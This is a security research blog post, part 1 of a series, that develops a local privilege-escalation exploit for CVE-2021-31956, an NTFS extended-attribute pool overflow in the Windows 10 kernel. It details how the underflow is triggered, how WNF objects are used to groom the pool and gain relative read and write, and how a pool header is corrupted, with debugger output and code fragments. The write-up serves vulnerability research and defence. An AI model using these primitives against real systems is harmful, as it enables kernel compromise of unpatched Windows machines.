Normal view

There are new articles available, click to refresh the page.
Before yesterdayNCC Group Research

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1

15 July 2021 at 12:07

Introduction

Recently I decided to take a look at CVE-2021-31956, a local privilege escalation within Windows due to a kernel memory corruption bug which was patched within the June 2021 Patch Tuesday.

Microsoft describe the vulnerability within their advisory document, which notes many versions of Windows being affected and in-the-wild exploitation of the issue being used in targeted attacks. The exploit was found in the wild by https://twitter.com/oct0xor of Kaspersky.

Kaspersky produced a nice summary of the vulnerability and describe briefly how the bug was exploited in the wild.

As I did not have access to the exploit (unlike Kaspersky?), I attempted to exploit this vulnerability on Windows 10 20H2 to determine the ease of exploitation and to understand the challenges attackers face when writing a modern kernel pool exploits for Windows 10 20H2 and onwards.

One thing that stood out to me was the mention of the Windows Notification Framework (WNF) used by the in-the-wild attackers to enable novel exploit primitives. This lead to further investigation into how this could be used to aid exploitation in general. The findings I present below are obviously speculation based on likely uses of WNF by an attacker. I look forward to seeing the Kaspersky write-up to determine if my assumptions on how this feature could be leveraged are correct!

This blog post is the first in the series and will describe the vulnerability, the initial constraints from an exploit development perspective and finally how WNF can be abused to obtain a number of exploit primitives. The blogs will also cover exploit mitigation challenges encountered along the way, which make writing modern pool exploits more difficult on the most recent versions of Windows.

Future blog posts will describe improvements which can be made to an exploit to enhance reliability, stability and clean-up afterwards.

Vulnerability Summary

As there was already a nice summary produced by Kaspersky it was trivial to locate the vulnerable code inside the ntfs.sys driver’s NtfsQueryEaUserEaList function:

The backing structure in this case is _FILE_FULL_EA_INFORMATION.

Basically the code above loops through each NTFS extended attribute (Ea) for a file and copies from the Ea Block into the output buffer based on the size of ea_block->EaValueLength + ea_block->EaNameLength + 9.

There is a check to ensure that the ea_block_size is less than or equal to out_buf_length - padding.

The out_buf_length is then decremented by the size of the ea_block_size and its padding.

The padding is calculated by ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;

This is because each Ea Block should be padded to be 32-bit aligned.

Putting some example numbers into this, lets assume the following: There are two extended attributes within the extended attributes for the file.

At the first iteration of the loop we could have the following values:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18
padding = 0

So assuming that 18 < out_buf_length - 0, data would be copied into the buffer. We will use 30 for this example.

out_buf_length = 30 - 18 + 0
out_buf_length = 12 // we would have 12 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

We could then have a second extended attribute in the file with the same values :

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18

At this point padding is 2, so the calculation is:

18 <= 12 - 2 // is False.

Therefore, the second memory copy would correctly not occur due to the buffer being too small.

However, consider the scenario when we have the following setup if we could have the out_buf_length of 18.

First extended attribute:

EaNameLength = 5
EaValueLength = 4

Second extended attribute:

EaNameLength = 5
EaValueLength = 47

First iteration the loop:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 // 18
padding = 0

The resulting check is:

18 <= 18 - 0 // is True and a copy of 18 occurs.
out_buf_length = 18 - 18 + 0 
out_buf_length = 0 // We would have 0 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

Our second extended attribute with the following values:

EaNameLength = 5
EaValueLength = 47

ea_block_size = 5 + 47 + 9
ea_block_size = 137

In the resulting check will be:

ea_block_size <= out_buf_length - padding

137 <= 0 - 2

And at this point we have underflowed the check and 137 bytes will be copied off the end of the buffer, corrupting the adjacent memory.

Looking at the caller of this function NtfsCommonQueryEa, we can see the output buffer is allocated on the paged pool based on the size requested:

By looking at the callers for NtfsCommonQueryEa we can see that we can see that NtQueryEaFile system call path triggers this code path to reach the vulnerable code.

The documentation for the Zw version of this syscall function is here.

We can see that the output buffer Buffer is passed in from userspace, together with the Length of this buffer. This means we end up with a controlled size allocation in the kernel space based on the size of the buffer. However, to trigger this vulnerability, we need to trigger an underflow as described as above.

In order to do trigger the underflow, we need to set our output buffer size to be length of the first Ea Block.

Providing we are padding the allocation, the second Ea Block will be written out of bounds of the buffer when the second Ea Block is queried.

The interesting things from this vulnerability from an attacker perspective are:

1) The attacker can control the data which is used within the overflow and the size of the overflow. Extended attribute values do not constrain the values which they can contain.
2) The overflow is linear and will corrupt any adjacent pool chunks.
3) The attacker has control over the size of the pool chunk allocated.

However, the question is can this be exploited reliably in the presence of modern kernel pool mitigations and is this a “good” memory corruption:

What makes a good memory corruption.

Triggering the corruption

So how do we construct a file containing NTFS extended attributes which will lead to the vulnerability being triggered when NtQueryEaFile is called?

The function NtSetEaFile has the Zw version documented here.

The Buffer parameter here is “a pointer to a caller-supplied, FILE_FULL_EA_INFORMATION-structured input buffer that contains the extended attribute values to be set”.

Therefore, using the values above, the first extended attribute occupies the space within the buffer between 0-18.

There is then the padding length of 2, with the second extended attribute starting at 20 offset.

typedef struct _FILE_FULL_EA_INFORMATION {
  ULONG  NextEntryOffset;
  UCHAR  Flags;
  UCHAR  EaNameLength;
  USHORT EaValueLength;
  CHAR   EaName[1];
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;

The key thing here is that NextEntryOffset of the first EA block is set to the offset of the overflowing EA including the padding position (20). Then for the overflowing EA block the NextEntryOffset is set to 0 to end the chain of extended attributes being set.

This means constructing two extended attributes, where the first extended attribute block is the size in which we want to allocate our vulnerable buffer (minus the pool header). The second extended attribute block is set to the overflow data.

If we set our first extended attribute block to be exactly the size of the Length parameter passed in NtQueryEaFile then, provided there is padding, the check will be underflowed and the second extended attribute block will allow copy of an attacker-controlled size.

So in summary, once the extended attributes have been written to the file using NtSetEaFile. It is then necessary to trigger the vulnerable code path to act on them by setting the outbuffer size to be exactly the same size as our first extended attribute using NtQueryEaFile.

Understanding the kernel pool layout on Windows 10

The next thing we need to understand is how kernel pool memory works. There is plenty of older material on kernel pool exploitation on older versions of Windows, however, not very much on recent versions of Windows 10 (19H1 and up). There has been significant changes with bringing userland Segment Heap concepts to the Windows kernel pool. I highly recommend reading Scoop the Windows 10 Pool! by Corentin Bayet and Paul Fariello from Synacktiv for a brilliant paper on this and proposing some initial techniques. Without this paper being published already, exploitation of this issue would have been significantly harder.

Firstly the important thing to understand is to determine where in memory the vulnerable pool chunk is allocated and what the surrounding memory looks like. We determine what heap structure in which the chunk lives on from the four “backends”:

  • Low Fragmentation Heap (LFH)
  • Variable Size Heap (VS)
  • Segment Allocation
  • Large Alloc

I started off using the NtQueryEaFile parameter Length value above of 0x12 to end up with a vulnerable chunk of sized 0x30 allocated on the LFH as follows:

Pool page ffff9a069986f3b0 region is Paged pool
 ffff9a069986f010 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f040 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f070 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f0a0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f0d0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f100 size:   30 previous size:    0  (Allocated)  Luaf
 ffff9a069986f130 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f160 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f190 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f1c0 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f1f0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f220 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f250 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f280 size:   30 previous size:    0  (Free)       SeGa
 ffff9a069986f2b0 size:   30 previous size:    0  (Free)       Ntf0
 ffff9a069986f2e0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f310 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f340 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f370 size:   30 previous size:    0  (Free)       APpt
*ffff9a069986f3a0 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff9a069986f3d0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f400 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f430 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f460 size:   30 previous size:    0  (Free)       SeUs
 ffff9a069986f490 size:   30 previous size:    0  (Free)       SeGa

This is due to the size of the allocation fitting being below 0x200.

We can step through the corruption of the adjacent chunk occurring by settings a conditional breakpoint on the following location:

bp Ntfs!NtfsQueryEaUserEaList "j @r12 != 0x180 & @r12 != 0x10c & @r12 != 0x40 '';'gc'" then breakpointing on the memcpy location.

This example ignores some common sizes which are often hit on 20H2, as this code path is used by the system often under normal operation.

It should be mentioned that I initially missed the fact that the attacker has good control over the size of the pool chunk initially and therefore went down the path of constraining myself to an expected chunk size of 0x30. This constraint was not actually true, however, demonstrates that even with more restricted attacker constraints these can often be worked around and that you should always try to understand the constraints of your bug fully before jumping into exploitation 🙂

By analyzing the vulnerable NtFE allocation, we can see we have the following memory layout:

!pool @r9
*ffff8001668c4d80 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff8001668c4db0 size:   30 previous size:    0  (Free)       C...

1: kd> dt !_POOL_HEADER ffff8001668c4d80
nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

Followed by 0x12 bytes of the data itself.

This means that chunk size calculation will be, 0x12 + 0x10 = 0x22, with this then being rounded up to the 0x30 segment chunk size.

We can however also adjust both the size of the allocation and the amount of data we will overflow.

As an alternative example, using the following values overflows from a chunk of 0x70 into the adjacent pool chunk (debug output is taken from testing code):

NtCreateFile is located at 0x773c2f20 in ntdll.dll
RtlDosPathNameToNtPathNameN is located at 0x773a1bc0 in ntdll.dll
NtSetEaFile is located at 0x773c42e0 in ntdll.dll
NtQueryEaFile is located at 0x773c3e20 in ntdll.dll
WriteEaOverflow EaBuffer1->NextEntryOffset is 96
WriteEaOverflow EaLength1 is 94
WriteEaOverflow EaLength2 is 59
WriteEaOverflow Padding is 2
WriteEaOverflow ea_total is 155
NtSetEaFileN sucess
output_buf_size is 94
GetEa2 pad is 1
GetEa2 Ea1->NextEntryOffset is 12
GetEa2 EaListLength is 31
GetEa2 out_buf_length is 94

This ends up being allocated within a 0x70 byte chunk:

ffffa48bc76c2600 size:   70 previous size:    0  (Allocated)  NtFE

As you can see it is therefore possible to influence the size of the vulnerable chunk.

At this point, we need to determine if it is possible to allocate adjacent chunks of a useful size class which can be overflowed into, to gain exploit primitives, as well as how to manipulate the paged pool to control the layout of these allocations (feng shui).

Much less has been written on Windows Paged Pool manipulation than Non-Paged pool and to our knowledge nothing at all has been publicly written about using WNF structures for exploitation primitives so far.

WNF Introduction

The Windows Notification Facitily is a notification system within Windows which implements a publisher/subscriber model for delivering notifications.

Great previous research has been performed by Alex Ionescu and Gabrielle Viala documenting how this feature works and is designed.

I don’t want to duplicate the background here, so I recommend reading the following documents first to get up to speed:

Having a good grounding in the above research will allow a better understanding of how WNF related structures used by Windows.

Controlled Paged Pool Allocation

One of the first important things for kernel pool exploitation is being able to control the state of the kernel pool to be able to obtain a memory layout desired by the attacker.

There has been plenty of previous research into non-paged pool and the session pool, however, less from a paged pool perspective. As this overflow is occurring within the paged pool, then we need to find exploit primitives allocated within this pool.

Now after some reversing of WNF, it was determined that the majority of allocations used within this feature use memory from the paged pool.

I started off by looking through the primary structures associated with this feature and what could be controlled from userland.

One of the first things which stood out to me was that the actual data used for notifications is stored after the following structure:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

Which is pointed at by the WNF_NAME_INSTANCE structure’s StateData pointer:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Looking at the function NtUpdateWnfStateData we can see that this can be used for controlled size allocations within the paged pool, and can be used to store arbitrary data.

The following allocation occurs within ExpWnfWriteStateData, which is called from NtUpdateWnfStateData:

v19 = ExAllocatePoolWithQuotaTag((POOL_TYPE)9, (unsigned int)(v6 + 16), 0x20666E57u);

Looking at the prototype of the function:

We can see that the argument Length is our v6 value 16 (the 0x10-byte header prepended).

Therefore, we have (0x10-bytes of _POOL_HEADER) header as follows:

1: kd> dt _POOL_HEADER
nt!_POOL_HEADER
   +0x000 PreviousSize     : Pos 0, 8 Bits
   +0x000 PoolIndex        : Pos 8, 8 Bits
   +0x002 BlockSize        : Pos 0, 8 Bits
   +0x002 PoolType         : Pos 8, 8 Bits
   +0x000 Ulong1           : Uint4B
   +0x004 PoolTag          : Uint4B
   +0x008 ProcessBilled    : Ptr64 _EPROCESS
   +0x008 AllocatorBackTraceIndex : Uint2B
   +0x00a PoolTagHash      : Uint2B

followed by the _WNF_STATE_DATA of size 0x10:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

With the arbitrary-sized data following the structure.

To track the allocations we make using this function we can use:

nt!ExpWnfWriteStateData "j @r8 = 0x100 '';'gc'"

We can then construct an allocation method which creates a new state name and performs our allocation:

NtCreateWnfStateName(&state, WnfTemporaryStateName, WnfDataScopeMachine, FALSE, 0, 0x1000, psd);
NtUpdateWnfStateData(&state, buf, alloc_size, 0, 0, 0, 0);

Using this we can spray controlled sizes within the paged pool and fill it with controlled objects:

1: kd> !pool ffffbe0f623d7190
Pool page ffffbe0f623d7190 region is Paged pool
 ffffbe0f623d7020 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7050 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7080 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7110 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7140 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
*ffffbe0f623d7170 size:   30 previous size:    0  (Allocated) *Wnf  Process: ffff87056ccc0080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffffbe0f623d71a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d71d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7200 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7230 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7260 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7290 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7320 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7350 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7380 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7410 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7440 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7470 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7500 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7530 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7560 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7590 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7620 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7650 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7680 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7710 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7740 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7770 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7800 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7830 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7860 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7890 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7920 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7950 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7980 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7aa0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ad0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7cb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ce0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7da0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffffbe0f623d7dd0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ec0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ef0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7fb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080

This is useful for filling the pool with data of a controlled size and data, and we continue our investigation of the WNF feature.

Controlled Free

The next thing which would be useful from an exploit perspective would be the ability to free WNF chunks on demand within the paged pool.

There’s also an API call which does this called NtDeleteWnfStateData, which calls into ExpWnfDeleteStateData in turn ends up free’ing our allocation.

Whilst researching this area, I was able to reuse the free’d chunk straight away with a new allocation. More investigation is needed to determine if the LFH makes use of delayed free lists as in my case from empirical testing, then I did not seem to be hitting this after a large spray of Wnf chunks.

Relative Memory Read

Now we have the ability to perform both a controlled allocation and free, but what about the data, itself and can we do anything useful with it?

Well, looking back at the structure, you may well have spotted that the AllocatedSize and DataSize are contained within it:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

The DataSize is to denote the size of the actual data following the structure within memory and is used for bounds checking within the NtQueryWnfStateData function. The actual memory copy operation takes place in the function ExpWnfReadStateData:

So the obvious thing here is that if we can corrupt DataSize then this will give relative kernel memory disclosure.

I say relative because the _WNF_STATE_DATA structure is pointed at by the StateData pointer of the _WNF_NAME_INSTANCE which it is associated with:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Having this relative read now allows disclosure of other adjacent objects within the pool. Some output as an example from my code:

found corrupted element changeTimestamp 54545454 at index 4972
len is 0xff
41 41 41 41 42 42 42 42  43 43 43 43 44 44 44 44  |  AAAABBBBCCCCDDDD
00 00 03 0B 57 6E 66 20  E0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  D0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  80 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 03 4E 74 66 30  70 76 6B D8 F9 97 D9 42  |  ....Ntf0pvk....B
60 D6 55 AA 85 B4 FF FF  01 00 00 00 00 00 00 00  |  `.U.............
7D B0 29 01 00 00 00 00  41 41 41 41 41 41 41 41  |  }.).....AAAAAAAA
00 00 03 0B 57 6E 66 20  20 76 6B D8 F9 97 D9 42  |  ....Wnf  vk....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41     |  AAAAAAAAAAAAAAA

At this point there are many interesting things which can be leaked out, especially considering that the both the NTFS vulnerable chunk and the WNF chunk can be positioned with other interesting objects. Items such as the ProcessBilled field can also be leaked using this technique.

We can also use the ChangeStamp value to determine which of our objects is corrupted when spraying the pool with _WNF_STATE_DATA objects.

Relative Memory Write

So what about writing data outside the bounds?

Taking a look at the NtUpdateWnfStateData function, we end up with an interesting call: ExpWnfWriteStateData((__int64)nameInstance, InputBuffer, Length, MatchingChangeStamp, CheckStamp);. Below shows some of the contents of the ExpWnfWriteStateData function:

We can see that if we corrupt the AllocatedSize, represented by v12[1] in the code above, so that it is bigger than the actual size of the data, then the existing allocation will be used and a memcpy operation will corrupt further memory.

So at this point its worth noting that the relative write has not really given us anything more than we had already with the NTFS overflow. However, as the data can be both read and written back using this technique then it opens up the ability to read data, modify certain parts of it and write it back.

_POOL_HEADER BlockSize Corruption to Arbitrary Read using Pipe Attributes

As mentioned previously, when I first started investigating this vulnerability, I was under the impression that the pool chunk needed to be very small in order to trigger the underflow, but this wrong assumption lead to me trying to pivot to pool chunks of a more interesting variety. By default, within the 0x30 chunk segment alone, I could not find any interesting objects which could be used to achieve arbitrary read.

Therefore my approach was to use the NTFS overflow to corrupt the BlockSize of a 0x30 sized chunk WNF _POOL_HEADER.

nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

By ensuring that the PoolQuota bit of the PoolType is not set, we can avoid any integrity checks for when the chunk is freed.

By setting the BlockSize to a different size, once the chunk is free’d using our controlled free, we can force the chunks address to be stored within the wrong lookaside list for the size.

Then we can reallocate another object of a different size, matching the size we used when corrupting the chunk now placed on that lookaside list, to take the place of this object.

Finally, we can then trigger corruption again and therefore corrupt our more interesting object.

Initially I demonstrated this being possible using another WNF chunk of size 0x220:

1: kd> !pool @rax
Pool page ffff9a82c1cd4a30 region is Paged pool
 ffff9a82c1cd4000 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4030 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
